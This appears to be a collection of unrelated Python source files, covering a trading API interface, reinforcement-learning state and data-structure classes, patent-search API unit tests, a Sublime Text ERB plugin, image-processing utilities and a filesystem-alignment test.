user.is_active = True
user.save()
print('Usuário criado com sucesso.')
|
60385
|
from .decorators import endpoint
from ..definitions.types import ClientExtensions
from ..definitions.types import InstrumentName
from ..definitions.types import StopLossDetails
from ..definitions.types import TakeProfitDetails
from ..definitions.types import TradeID
from ..definitions.types import TradeSpecifier
from ..definitions.types import TradeStateFilter
from ..definitions.types import TrailingStopLossDetails
from ..endpoints.annotations import Count
from ..endpoints.annotations import Ids
from ..endpoints.annotations import Units
from ..endpoints.trade import *
from ..definitions.helpers import sentinel
__all__ = ['TradeInterface']
class TradeInterface(object):
@endpoint(GETTrades)
def list_trades(self,
ids: Ids = sentinel,
state: TradeStateFilter = sentinel,
instrument: InstrumentName = sentinel,
count: Count = sentinel,
trade_id: TradeID = sentinel):
"""
Get a list of Trades for an Account
Args:
ids: :class:`~async_v20.endpoints.annotations.Ids`
List of Trade IDs to retrieve.
state: :class:`~async_v20.TradeStateFilter`
The state to filter the requested Trades by.
instrument: :class:`~async_v20.InstrumentName`
The instrument to filter the requested Trades by.
count: :class:`~async_v20.endpoints.annotations.Count`
The maximum number of Trades to return.
trade_id: :class:`~async_v20.TradeID`
The maximum Trade ID to return. If not provided the most recent
Trades in the Account are returned.
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(trades=( :class:`~async_v20.Trade`, ...),
lastTransactionID= :class:`~async_v20.TransactionID`)
"""
pass
@endpoint(GETOpenTrades)
def list_open_trades(self):
"""
Get the list of open Trades for an Account
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(trades=( :class:`~async_v20.Trade`, ...),
lastTransactionID= :class:`~async_v20.TransactionID`)
"""
pass
@endpoint(GETTradeSpecifier)
def get_trade(self, trade_specifier: TradeSpecifier = sentinel):
"""
Get the details of a specific Trade in an Account
Args:
trade_specifier: :class:`~async_v20.TradeSpecifier`
Specifier for the Trade
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(trade= :class:`~async_v20.Trade`,
lastTransactionID= :class:`~async_v20.TransactionID`)
"""
pass
@endpoint(PUTTradeSpecifierClose)
def close_trade(self,
trade_specifier: TradeSpecifier = sentinel,
units: Units = sentinel):
"""
Close (partially or fully) a specific open Trade in an Account
Args:
trade_specifier: :class:`~async_v20.TradeSpecifier`
Specifier for the Trade
units: :class:`~async_v20.endpoints.annotations.Units`
Indication of how much of the Trade to close. Either the string
"ALL" (indicating that all of the Trade should be closed), or a
DecimalNumber representing the number of units of the open
Trade to Close using a TradeClose MarketOrder. The units
specified must always be positive, and the magnitude of the
value cannot exceed the magnitude of the Trade's open units.
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(orderCreateTransaction= :class:`~async_v20.MarketOrderTransaction`,
orderFillTransaction= :class:`~async_v20.OrderFillTransaction`,
orderCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
lastTransactionID= :class:`~async_v20.TransactionID`)
status [400]
:class:`~async_v20.interface.response.Response`
(orderRejectTransaction= :class:`~async_v20.MarketOrderRejectTransaction`,
errorCode= :class:`~builtins.str`,
errorMessage= :class:`~builtins.str`)
status [401]
:class:`~async_v20.interface.response.Response`
(orderRejectTransaction= :class:`~async_v20.MarketOrderRejectTransaction`,
lastTransactionID= :class:`~async_v20.TransactionID`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
errorCode= :class:`~builtins.str`,
errorMessage= :class:`~builtins.str`)
"""
pass
@endpoint(PUTTradeSpecifierClientExtensions)
def set_client_extensions_trade(self,
trade_specifier: TradeSpecifier = sentinel,
client_extensions: ClientExtensions = sentinel):
"""
Update the Client Extensions for a Trade. Do not add, update, or delete
the Client Extensions if your account is associated with MT4.
Args:
trade_specifier: :class:`~async_v20.TradeSpecifier`
Specifier for the Trade
client_extensions: :class:`~async_v20.ClientExtensions`
The Client Extensions to update the Trade with. Do not add,
update, or delete the Client Extensions if your account is
associated with MT4.
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(tradeClientExtensionsModifyTransaction=
:class:`~async_v20.TradeClientExtensionsModifyTransaction`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
lastTransactionID= :class:`~async_v20.TransactionID`)
status [400]
:class:`~async_v20.interface.response.Response`
(tradeClientExtensionsModifyRejectTransaction=
:class:`~async_v20.TradeClientExtensionsModifyRejectTransaction`,
lastTransactionID= :class:`~async_v20.TransactionID`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
errorCode= :class:`~builtins.str`,
errorMessage= :class:`~builtins.str`)
status [401]
:class:`~async_v20.interface.response.Response`
(tradeClientExtensionsModifyRejectTransaction=
:class:`~async_v20.TradeClientExtensionsModifyRejectTransaction`,
lastTransactionID= :class:`~async_v20.TransactionID`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
errorCode= :class:`~builtins.str`,
errorMessage= :class:`~builtins.str`)
"""
pass
@endpoint(PUTTradesSpecifierOrders)
def set_dependent_orders_trade(self,
trade_specifier: TradeSpecifier = sentinel,
take_profit: TakeProfitDetails = sentinel,
stop_loss: StopLossDetails = sentinel,
trailing_stop_loss: TrailingStopLossDetails = sentinel):
"""
Create, replace and cancel a Trade's dependent Orders (Take Profit,
Stop Loss and Trailing Stop Loss) through the Trade itself
Args:
trade_specifier: :class:`~async_v20.TradeSpecifier`
Specifier for the Trade
take_profit: :class:`~async_v20.TakeProfitDetails`
The specification of the Take Profit to create/modify/cancel.
If takeProfit is set to null, the Take Profit Order will be
cancelled if it exists. If takeProfit is not provided, the
existing Take Profit Order will not be modified. If a sub-
field of takeProfit is not specified, that field will be set to
a default value on create, and be inherited by the replacing
order on modify.
stop_loss: :class:`~async_v20.StopLossDetails`
The specification of the Stop Loss to create/modify/cancel. If
stopLoss is set to null, the Stop Loss Order will be cancelled
if it exists. If stopLoss is not provided, the existing Stop
Loss Order will not be modified. If a sub-field of stopLoss is
not specified, that field will be set to a default value on
create, and be inherited by the replacing order on modify.
trailing_stop_loss: :class:`~async_v20.TrailingStopLossDetails`
The specification of the Trailing Stop Loss to
create/modify/cancel. If trailingStopLoss is set to null, the
Trailing Stop Loss Order will be cancelled if it exists. If
trailingStopLoss is not provided, the existing Trailing Stop
Loss Order will not be modified. If a sub-field of
trailingStopLoss is not specified, that field will be set to a
default value on create, and be inherited by the replacing
order on modify.
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(takeProfitOrderCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
takeProfitOrderTransaction= :class:`~async_v20.TakeProfitOrderTransaction`,
takeProfitOrderFillTransaction= :class:`~async_v20.OrderFillTransaction`,
takeProfitOrderCreatedCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
stopLossOrderCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
stopLossOrderTransaction= :class:`~async_v20.StopLossOrderTransaction`,
stopLossOrderFillTransaction= :class:`~async_v20.OrderFillTransaction`,
stopLossOrderCreatedCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
trailingStopLossOrderCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
trailingStopLossOrderTransaction= :class:`~async_v20.TrailingStopLossOrderTransaction`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
lastTransactionID= :class:`~async_v20.TransactionID`)
status [400]
:class:`~async_v20.interface.response.Response`
(takeProfitOrderCancelRejectTransaction=
:class:`~async_v20.OrderCancelRejectTransaction`,
takeProfitOrderRejectTransaction= :class:`~async_v20.TakeProfitOrderRejectTransaction`,
stopLossOrderCancelRejectTransaction= :class:`~async_v20.OrderCancelRejectTransaction`,
stopLossOrderRejectTransaction= :class:`~async_v20.StopLossOrderRejectTransaction`,
trailingStopLossOrderCancelRejectTransaction=
:class:`~async_v20.OrderCancelRejectTransaction`,
trailingStopLossOrderRejectTransaction=
:class:`~async_v20.TrailingStopLossOrderRejectTransaction`,
lastTransactionID= :class:`~async_v20.TransactionID`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
errorCode= :class:`~builtins.str`,
errorMessage= :class:`~builtins.str`)
"""
pass
|
60412
|
from simple_rl.mdp.oomdp.OOMDPStateClass import OOMDPState
class TrenchOOMDPState(OOMDPState):
''' Class for Trench World States '''
def __init__(self, objects):
OOMDPState.__init__(self, objects=objects)
def get_agent_x(self):
return self.objects["agent"][0]["x"]
def get_agent_y(self):
return self.objects["agent"][0]["y"]
def __hash__(self):
state_hash = str(self.get_agent_x()) + str(self.get_agent_y()) + str(self.objects["agent"][0]["dx"] + 1)\
+ str(self.objects["agent"][0]["dy"] + 1) + str(self.objects["agent"][0]["dest_x"])\
+ str(self.objects["agent"][0]["dest_x"]) + str(self.objects["agent"][0]["dest_y"]) + \
str(self.objects["agent"][0]["has_block"]) + "00"
for b in self.objects["block"]:
state_hash += str(b["x"]) + str(b["y"])
state_hash += "00"
for l in self.objects["lava"]:
state_hash += str(l["x"]) + str(l["y"])
return int(state_hash)
def __eq__(self, other_trench_state):
return hash(self) == hash(other_trench_state)
|
60436
|
from node import Node
class Stack:
def __init__(self):
self.head = None
def __str__(self):
node = self.head
list = []
while node:
list.append(node.get_item())
node = node.get_next()
return str(list)
def is_empty(self):
return not self.head
def push(self, item):
if not self.head:
self.head = Node(item)
else:
self.head = Node(item,self.head)
def pop(self):
if not self.head:
raise EmptyStackException('Cannot pop from a empty stack')
else:
item = self.head.get_item()
if self.head.get_next():
self.head = self.head.get_next()
else:
self.head = None
return item
def peek(self):
if not self.head:
raise EmptyStackException('Cannot peek from an empty stack')
else:
return self.head.get_item()
def size(self):
count = 0
node = self.head
while node:
count += 1
node = node.get_next()
return count
class EmptyStackException(Exception):
pass
|
60453
|
import sys
import typing
from metal.serial import Engine
from metal.serial.hooks import MacroHook
from metal.serial.preprocessor import MacroExpansion
class Argv(MacroHook):
identifier = 'METAL_SERIAL_INIT_ARGV'
def invoke(self, engine: Engine, macro_expansion: MacroExpansion):
engine.write_int(len(self.argv))
data = b'\0'.join(arg.encode() for arg in self.argv) + b'\0'
res = engine.write_memory(data)
if res != len(data):
print("***metal.serial***: Couldn't write all of argv, buffer size was {}".format(res), file=sys.stderr)
def __init__(self, argv: typing.List[str]):
self.argv = argv
super().__init__()
def build_argv_hook(argv: typing.List[str]):
return lambda : Argv(argv)
|
60495
|
from collections import Counter, defaultdict
def fizz_buzz_counter():
values = []
for i in range(1, 101):
if i % 3 == 0 and i % 5 == 0:
values.append("fizzbuzz")
elif i % 3 == 0:
values.append("fizz")
elif i % 5 == 0:
values.append("buzz")
else:
values.append("int")
return Counter(values)
def fizz_buzz_defaultdict():
values = defaultdict(int)
for i in range(1, 101):
if i % 3 == 0 and i % 5 == 0:
values["fizzbuzz"] += 1
elif i % 3 == 0:
values["fizz"] += 1
elif i % 5 == 0:
values["buzz"] += 1
else:
values["int"] += 1
return values
print(dict(fizz_buzz_counter()))
print(dict(fizz_buzz_defaultdict()))
|
60511
|
import unittest
# Run tests without using GPU
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
os.environ['TEST'] = "1"
import sys
from pathlib import Path
TEST_DIR = str(Path(__file__).parent.resolve())
BASE_DIR = str(Path(__file__).parent.parent.resolve())
sys.path.append(BASE_DIR)
from core.filters import PublicationDateFilter
from dateutil.parser import parse as parse_date
from core.api import APIRequest
from core.api import SearchRequest102
from core.api import SearchRequest103
from core.api import SnippetRequest
from core.api import MappingRequest
from core.api import DatasetSampleRequest
from core.api import SimilarPatentsRequest
from core.api import PatentPriorArtRequest
from core.api import BadRequestError
from core.api import ServerError
from core.api import ResourceNotFoundError
from core.api import DocumentRequest
from core.api import PatentDataRequest
from core.api import TitleRequest
from core.api import AbstractRequest
from core.api import AllClaimsRequest
from core.api import OneClaimRequest
from core.api import IndependentClaimsRequest
from core.api import PatentDescriptionRequest
from core.api import CitationsRequest
from core.api import BackwardCitationsRequest
from core.api import ForwardCitationsRequest
from core.api import AbstractConceptsRequest
from core.api import DescriptionConceptsRequest
from core.api import CPCsRequest
from core.api import ListThumbnailsRequest
from core.api import ThumbnailRequest
from core.api import PatentCPCVectorRequest
from core.api import PatentAbstractVectorRequest
from core.api import SimilarConceptsRequest
from core.api import ConceptVectorRequest
from core.api import DrawingRequest
from core.api import ListDrawingsRequest
from core.api import AggregatedCitationsRequest
class TestRequestClass(unittest.TestCase):
class GreetingRequest(APIRequest):
greetings = { 'en': 'Hello', 'de': 'Hallo' }
def __init__(self, req_data):
super().__init__(req_data)
def _serving_fn(self):
lang = self._data['lang']
return self.greetings[lang]
def _validation_fn(self):
if not 'lang' in self._data:
raise BadRequestError('Invalid request.')
def test_can_create_dummy_request(self):
req = APIRequest()
self.assertEqual(req.serve(), None)
def test_serving_fn_operation(self):
req = self.GreetingRequest({ 'lang': 'en' })
self.assertEqual('Hello', req.serve())
def test_raises_error_on_invalid_request(self):
def create_invalid_request():
return self.GreetingRequest({ 'locale': 'en' })
self.assertRaises(BadRequestError, create_invalid_request)
def test_raises_error_on_expection_during_serving(self):
req = self.GreetingRequest({ 'lang': 'hi' })
self.assertRaises(ServerError, req.serve)
class TestSearchRequest102Class(unittest.TestCase):
def setUp(self):
self.query = 'reducing carbon emissions'
self.date = '2017-12-12'
self.subclass = 'Y02T'
self.latent_query = 'by using green technologies'
def test_simple_search_request(self):
results = self.search({ 'q': self.query })
self.assertGreater(len(results), 0)
def test_return_custom_number_of_results(self):
results = self.search({ 'q': self.query, 'n': 13 })
self.assertEqual(13, len(results))
def test_query_with_before_cutoff_date(self):
results = self.search({ 'q': self.query, 'before': self.date })
def published_before(r):
d1 = parse_date(r['publication_date'])
d2 = parse_date(self.date)
return d1 <= d2
self.assertForEach(results, published_before)
def test_query_with_after_cutoff_date(self):
results = self.search({ 'q': self.query, 'after': self.date})
def published_after(r):
d1 = parse_date(r['publication_date'])
d2 = parse_date(self.date)
return d1 >= d2
self.assertForEach(results, published_after)
def test_query_with_index_specified(self):
cc = self.subclass
results = self.search({ 'q': self.query, 'idx': cc })
from_cc = lambda r: r['index'].startswith(cc)
self.assertForEach(results, from_cc)
def test_latent_query_affects_results(self):
latent = self.search({ 'q': self.query, 'lq': self.latent_query })
without = self.search({ 'q': self.query })
self.assertNotEqual(latent, without)
def test_return_only_non_patent_results(self):
results = self.search({ 'q': 'control systems', 'type': 'npl' })
is_npl = lambda r: r['index'].endswith('npl')
self.assertForEach(results, is_npl)
def test_include_snippets(self):
results = self.search({ 'q': self.query, 'snip': 1 })
has_snippet = lambda r: r['snippet']
self.assertForEach(results, has_snippet)
def test_include_mappings(self):
results = self.search({ 'q': self.query, 'maps': 1 })
has_mappings = lambda r: r['mapping']
self.assertForEach(results, has_mappings)
def test_raises_error_with_bad_request(self):
bad_req = lambda: SearchRequest102({ 'qry': self.query })
self.assertRaises(BadRequestError, bad_req)
def test_pagination(self):
results_a = self.search({ 'q': self.query, 'n': 10 })
results_b = self.search({ 'q': self.query, 'n': 10, 'offset': 5})
self.assertEqual(results_a[5:], results_b[:5])
def search(self, req):
req = SearchRequest102(req)
results = req.serve()['results']
return results
def assertForEach(self, results, condition):
self.assertGreater(len(results), 0)
truth_arr = [condition(res) for res in results]
self.assertTrue(all(truth_arr))
class TestSearchRequest103Class(unittest.TestCase):
def setUp(self):
self.query = 'fire fighting drone uses dry ice'
def test_simple_search(self):
combinations = self.search({ 'q': self.query })
self.assertGreater(len(combinations), 0)
def test_return_custom_number_of_results(self):
combinations = self.search({ 'q': self.query, 'n': 8 })
self.assertEqual(8, len(combinations))
def test_pagination(self):
results_a = self.search({ 'q': self.query, 'n': 10 })
results_b = self.search({ 'q': self.query, 'n': 10, 'offset': 5})
self.assertEqual(results_a[5:], results_b[:5])
def search(self, req):
req = SearchRequest103(req)
results = req.serve()['results']
return results
class TestDatasetSampleRequestClass(unittest.TestCase):
def test_request_a_sample_from_poc(self):
self.assertSample('poc', 23)
self.assertSample('poc', 45023)
def test_request_a_sample_that_does_not_exist(self):
non_existent_sample = lambda: self.make_request('poc', 200200)
self.assertRaises(ServerError, non_existent_sample)
def test_access_non_existent_dataset(self):
non_existent_dataset = lambda: self.make_request('dog', 1)
self.assertRaises(ResourceNotFoundError, non_existent_dataset)
def test_invalid_request(self):
invalid_request = lambda: DatasetSampleRequest({ 'sample': 3 }).serve()
self.assertRaises(BadRequestError, invalid_request)
def assertSample(self, dataset, n):
sample = self.make_request(dataset, n)
self.assertIsInstance(sample, dict)
def make_request(self, dataset, n):
request = DatasetSampleRequest({ 'dataset': dataset, 'n': n })
return request.serve()
class TestSimilarPatentsRequestClass(unittest.TestCase):
def test_invalid_query(self):
make_bad_query = lambda: SimilarPatentsRequest({ 'q': 'drones'})
self.assertRaises(BadRequestError, make_bad_query)
def test_with_simple_query(self):
response = SimilarPatentsRequest({ 'pn': 'US7654321B2' }).serve()
self.assertIsInstance(response, dict)
self.assertIsInstance(response['results'], list)
self.assertGreater(len(response['results']), 0)
class TestPatentPriorArtRequestClass(unittest.TestCase):
def test_with_simple_query(self):
response = PatentPriorArtRequest({ 'pn': 'US7654321B2'}).serve()
results = response['results']
def published_before(r):
d1 = parse_date(r['publication_date'])
d2 = parse_date('2006-12-27')
return d1 <= d2
self.assertForEach(results, published_before)
def assertForEach(self, results, condition):
truth_arr = [condition(res) for res in results]
self.assertTrue(all(truth_arr))
class TestSnippetRequestClass(unittest.TestCase):
pass
class TestMappingRequestClass(unittest.TestCase):
pass
class TestDrawingRequestClass(unittest.TestCase):
def setUp(self):
self.pat = 'US7654321B2'
self.app = 'US20130291398A1'
def test_get_patent_drawing(self):
response = DrawingRequest({'pn': self.pat, 'n': 1}).serve()
self.assertIsInstance(response, str)
def test_get_second_image(self):
response = DrawingRequest({'pn': self.pat, 'n': 2}).serve()
self.assertIsInstance(response, str)
def test_get_publication_drawing(self):
response = DrawingRequest({'pn': self.app, 'n': 1}).serve()
self.assertIsInstance(response, str)
class TestListDrawingsRequestClass(unittest.TestCase):
def setUp(self):
self.pat = 'US7654321B2'
self.app = 'US20130291398A1'
def test_list_drawings_of_patent(self):
response = ListDrawingsRequest({'pn': self.pat}).serve()
self.assertEqual(8, len(response['drawings']))
self.assertEqual(self.pat, response['pn'])
def test_list_drawings_of_application(self):
response = ListDrawingsRequest({'pn': self.app}).serve()
self.assertEqual(12, len(response['drawings']))
self.assertEqual(self.app, response['pn'])
class TestDocumentRequestClass(unittest.TestCase):
def test_get_patent_document(self):
doc = DocumentRequest({'id': 'US7654321B2'}).serve()
self.assertIsInstance(doc, dict)
self.assertEqual(doc['id'], 'US7654321B2')
class TestPatentDataRequestClass(unittest.TestCase):
def test_returns_patent_data(self):
data = PatentDataRequest({'pn': 'US7654321B2'}).serve()
self.assertIsInstance(data, dict)
self.assertEqual(data['title'][:24], 'Formation fluid sampling')
self.assertEqual(data['pn'], 'US7654321B2')
self.assertNonNullString(data['abstract'])
self.assertNonNullString(data['description'])
self.assertIsInstance(data['claims'], list)
self.assertGreater(len(data['claims']), 0)
def assertNonNullString(self, string):
self.assertIsInstance(string, str)
self.assertGreater(len(string.strip()), 0)
class TestTitleRequestClass(unittest.TestCase):
def test_get_title(self):
pn = 'US7654321B2'
title = 'Formation fluid sampling apparatus and methods'
response = TitleRequest({'pn': pn}).serve()
self.assertEqual(response['pn'], pn)
self.assertEqual(response['title'], title)
class TestAbstractRequestClass(unittest.TestCase):
def test_get_abstract(self):
pn = 'US7654321B2'
abst = 'A fluid sampling system retrieves'
response = AbstractRequest({'pn': pn}).serve()
self.assertEqual(response['pn'], pn)
self.assertEqual(response['abstract'][:len(abst)], abst)
class TestAllClaimsRequestClass(unittest.TestCase):
def test_get_all_claims(self):
pn = 'US7654321B2'
response = AllClaimsRequest({'pn': pn}).serve()
self.assertIsInstance(response['claims'], list)
self.assertEqual(26, len(response['claims']))
class TestOneClaimRequestClass(unittest.TestCase):
def setUp(self):
self.pn = 'US7654321B2'
def test_get_one_claim(self):
claim_2 = '2. The fluid sampling system of claim 1, in which'
response = OneClaimRequest({'pn': self.pn, 'n': 2}).serve()
self.assertEqual(2, response['claim_num'])
self.assertEqual(claim_2, response['claim'][:len(claim_2)])
def test_raises_error_on_invalid_requests(self):
invalid_requests = [
{'pn': self.pn},
{'pn': self.pn, 'n': 0},
{'pn': self.pn, 'n': 'first'},
{'pn': self.pn, 'n': 27},
{'pn': self.pn, 'n': -1}
]
for req_data in invalid_requests:
req = lambda: OneClaimRequest(req_data).serve()
self.assertRaises(BadRequestError, req)
class TestIndependentClaimsRequestClass(unittest.TestCase):
def test_get_independent_claims(self):
pn = 'US7654321B2'
response = IndependentClaimsRequest({'pn': pn}).serve()
self.assertEqual(response['pn'], pn)
self.assertEqual(6, len(response['claims']))
class TestPatentDescriptionRequestClass(unittest.TestCase):
def test_get_description(self):
pn = 'US7654321B2'
response = PatentDescriptionRequest({'pn': pn}).serve()
self.assertNonNullString(response['description'])
def assertNonNullString(self, string):
self.assertIsInstance(string, str)
self.assertGreater(len(string.strip()), 0)
class TestCitationsRequestClass(unittest.TestCase):
def test_get_citations(self):
pn = 'US7654321B2'
response = CitationsRequest({'pn': pn}).serve()
self.assertIsInstance(response['citations_backward'], list)
self.assertGreater(len(response['citations_backward']), 0)
self.assertIsInstance(response['citations_forward'], list)
self.assertGreater(len(response['citations_forward']), 0)
class TestBackwardCitationsRequestClass(unittest.TestCase):
def test_get_back_citations(self):
pn = 'US7654321B2'
response = BackwardCitationsRequest({'pn': pn}).serve()
self.assertIsInstance(response['citations_backward'], list)
self.assertGreater(len(response['citations_backward']), 0)
class TestForwardCitationsRequestClass(unittest.TestCase):
def test_get_forward_citations(self):
pn = 'US7654321B2'
response = ForwardCitationsRequest({'pn': pn}).serve()
self.assertIsInstance(response['citations_forward'], list)
self.assertGreater(len(response['citations_forward']), 0)
class TestAbstractConceptsRequestClass(unittest.TestCase):
def test_get_concepts_from_abstract(self):
pn = 'US7654321B2'
response = AbstractConceptsRequest({'pn': pn}).serve()
self.assertIsInstance(response['concepts'], list)
self.assertGreater(len(response['concepts']), 0)
class TestDescriptionConceptsRequestClass(unittest.TestCase):
def test_get_concepts_from_description(self):
pn = 'US7654321B2'
response = AbstractConceptsRequest({'pn': pn}).serve()
self.assertIsInstance(response['concepts'], list)
self.assertGreater(len(response['concepts']), 0)
class TestCPCsRequestClass(unittest.TestCase):
def test_get_cpcs(self):
pn = 'US7654321B2'
response = CPCsRequest({'pn': pn}).serve()
self.assertIsInstance(response['cpcs'], list)
self.assertGreater(len(response['cpcs']), 0)
class TestListThumbnailsRequestClass(unittest.TestCase):
def test_get_list_of_available_thumbnails(self):
pn = 'US7654321B2'
response = ListThumbnailsRequest({'pn': pn}).serve()
self.assertEqual(8, len(response['thumbnails']))
class TestThumbnailRequestClass(unittest.TestCase):
def test_get_a_thumbnail(self):
req_data = {'pn': 'US7654321B2', 'n': '1'}
response = ThumbnailRequest(req_data).serve()
self.assertIsInstance(response, str)
class TestPatentCPCVectorRequestClass(unittest.TestCase):
def test_get_cpc_patent_vector(self):
pn = 'US7654321B2'
response = PatentCPCVectorRequest({'pn': pn}).serve()
self.assertIsInstance(response['vector'], list)
self.assertEqual(256, len(response['vector']))
class TestPatentAbstractVectorRequestClass(unittest.TestCase):
def test_get_abstract_text_vector(self):
pn = 'US7654321B2'
response = PatentAbstractVectorRequest({'pn': pn}).serve()
self.assertIsInstance(response['vector'], list)
self.assertEqual(768, len(response['vector']))
class TestSimilarConceptsRequestClass(unittest.TestCase):
def test_get_similar_concepts_to_vehicle(self):
response = SimilarConceptsRequest({'concept': 'vehicle'}).serve()
self.assertIsInstance(response['similar'], list)
self.assertGreater(len(response['similar']), 0)
def test_return_custom_number_of_concepts(self):
request = {'concept': 'vehicle', 'n': 13}
response = SimilarConceptsRequest(request).serve()
self.assertIsInstance(response['similar'], list)
self.assertEqual(13, len(response['similar']))
def test_raises_error_on_invalid_concept(self):
attempt = lambda: SimilarConceptsRequest({'concept': 'django'}).serve()
self.assertRaises(ResourceNotFoundError, attempt)
class TestConceptVectorRequestClass(unittest.TestCase):
def test_get_vector_for_vehicle(self):
response = ConceptVectorRequest({'concept': 'vehicle'}).serve()
self.assertIsInstance(response['vector'], list)
self.assertEqual(256, len(response['vector']))
def test_raises_error_on_invalid_concept(self):
attempt = lambda: ConceptVectorRequest({'concept': 'django'}).serve()
self.assertRaises(ResourceNotFoundError, attempt)
class TestAggregatedCitationsRequest(unittest.TestCase):
def test_get_one_level_citations(self):
req_data = {'levels': 1, 'pn': 'US7654321B2'}
response = AggregatedCitationsRequest(req_data).serve()
self.assertIsInstance(response, list)
self.assertEqual(len(response), 73)
def test_get_two_level_citations(self):
req_data = {'levels': 2, 'pn': 'US7654321B2'}
response = AggregatedCitationsRequest(req_data).serve()
self.assertIsInstance(response, list)
self.assertGreater(len(response), 73)
def test_raises_error_if_level_parameter_missing(self):
req_data = {'pn': 'US7654321B2'}
attempt = lambda: AggregatedCitationsRequest(req_data).serve()
self.assertRaises(BadRequestError, attempt)
def test_raises_error_if_no_level_specified(self):
req_data = {'pn': 'US7654321B2', 'levels': None}
attempt = lambda: AggregatedCitationsRequest(req_data).serve()
self.assertRaises(BadRequestError, attempt)
def test_raises_error_if_level_out_of_range(self):
req_data = {'levels': 5, 'pn': 'US7654321B2'}
attempt = lambda: AggregatedCitationsRequest(req_data).serve()
self.assertRaises(BadRequestError, attempt)
def test_raises_error_if_citations_grow_a_lot(self):
req_data = {'levels': 4, 'pn': 'US7654321B2'}
attempt = lambda: AggregatedCitationsRequest(req_data).serve()
self.assertRaises(ServerError, attempt)
if __name__ == '__main__':
unittest.main()
|
60552
|
import sublime, sublime_plugin
import os
try:
# ST3
from ..apis.core import Core
except (ImportError, ValueError):
# ST2
from apis.core import Core
# Completion
class ERBAutocompleteListener(sublime_plugin.EventListener):
def on_query_completions(self, view, prefix, locations):
core = Core()
self.completions = []
specialkey = False
scope = core.words.get('scope')
temp = core.get_line_text(view)
lineText = temp[-1]
specialkey = True if lineText.find("<") >= 0 else False
if scope and view.match_selector(locations[0], scope):
self.completions += core.words.get('completions')
self.completions += core.get_custom_tag()
if not self.completions:
return []
completions = list(self.completions)
if specialkey:
for idx, item in enumerate(self.completions):
self.completions[idx][1] = item[1][1:]
completions = [tuple(attr) for attr in self.completions]
return completions
def on_load(self, view):
filename = view.file_name()
if not filename:
return
core = Core()
name = os.path.basename(filename.lower())
if name[-8:] == "html.erb" or name[-3:] == "erb":
try:
view.settings().set('syntax', core.get_grammar_path())
print("Switched syntax to: ERB")
except:
pass
|
60628
|
import os
import numpy as np
import random
import numbers
import skimage
from skimage import io, color
import torch
# read uint8 image from path
def imread_uint8(imgpath, mode='RGB'):
'''
mode: 'RGB', 'gray', 'Y', 'L'.
'Y' and 'L' mean the Y channel of YCbCr.
'''
if mode == 'RGB':
img = io.imread(imgpath)
elif mode == 'gray':
img = io.imread(imgpath, as_gray=True)
img = skimage.img_as_ubyte(img)
elif mode in ['Y','L']:
# Y channel of YCbCr
# Note: The skimage.color.rgb2ycbcr() function is the same with that of matlab,
# PIL.Image.convert('YCbCr') is not.
img = io.imread(imgpath)
if img.ndim == 3:
img = color.rgb2ycbcr(img)[:,:,0]
img = img.round().astype(np.uint8)
return img
def augment_img(img, mode='8'):
'''flip and/or rotate the image randomly'''
if mode == '2':
mode = random.randint(0, 1)
elif mode == '4':
mode = random.randint(0, 3)
elif mode == '8':
mode = random.randint(0, 7)
else:
mode = 0
if mode == 0:
return img
elif mode == 1:
return np.fliplr(img)
elif mode == 2:
return np.rot90(img, k=2)
elif mode == 3:
return np.fliplr(np.rot90(img, k=2))
elif mode == 4:
return np.rot90(img, k=1)
elif mode == 5:
return np.fliplr(np.rot90(img, k=1))
elif mode == 6:
return np.rot90(img, k=3)
elif mode == 7:
return np.fliplr(np.rot90(img, k=3))
def random_crop(img, size):
'''crop image patch randomly'''
if isinstance(size, numbers.Number):
size = (int(size), int(size))
h, w = img.shape[0:2]
ph, pw = size
rnd_h = random.randint(0, h - ph)
rnd_w = random.randint(0, w - pw)
img_patch = img[rnd_h:rnd_h + ph, rnd_w:rnd_w + pw, ...]
return img_patch
def uint2tensor(img, normalized=True):
if img.ndim == 2:
img = img[:, :, np.newaxis]
img = skimage.img_as_float32(img)
if normalized:
img = (img - 0.5) / 0.5
img = torch.from_numpy(np.ascontiguousarray(img.transpose(2, 0, 1))).float()
return img
def tensor2uint(img, normalized=True):
img = img.data.squeeze().cpu().numpy().astype(np.float32)
if img.ndim == 3:
img = img.transpose(1, 2, 0)
elif img.ndim == 4:
img = img.transpose(0, 2, 3, 1)
if normalized:
img = img * 0.5 + 0.5
img = img.clip(0, 1) * 255
img = img.round().astype(np.uint8)
return img
def tensor3to4(tensor):
return tensor.unsqueeze(0)
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
|
60678
|
import os
import unittest
import tempfile
import fcntl
import struct
from ffrecord import checkFsAlign
FS_IOCNUM_CHECK_FS_ALIGN = 2147772004
def checkFsAlign2(fd):
buf = bytearray(4)
try:
fcntl.ioctl(fd, FS_IOCNUM_CHECK_FS_ALIGN, buf)
except OSError as err:
return False
fsAlign = struct.unpack("i", buf)
return fsAlign[0] == 1
class TestFsAlign(unittest.TestCase):
def subtest_fsalign(self, fname, is_aligned):
if not os.path.exists(fname):
print(f'{fname} does not exist, skip...')
return
fd = os.open(fname, os.O_RDONLY | os.O_DIRECT)
assert checkFsAlign(fd) == checkFsAlign2(fd) == is_aligned
def test_fs(self):
fname = "/public_dataset/1/ImageNet/train.ffr/PART_00000.ffr"
self.subtest_fsalign(fname, True)
def test_tmp(self):
with tempfile.NamedTemporaryFile() as tmp:
self.subtest_fsalign(tmp.name, False)
if __name__ == '__main__':
unittest.main()
|
60690
|
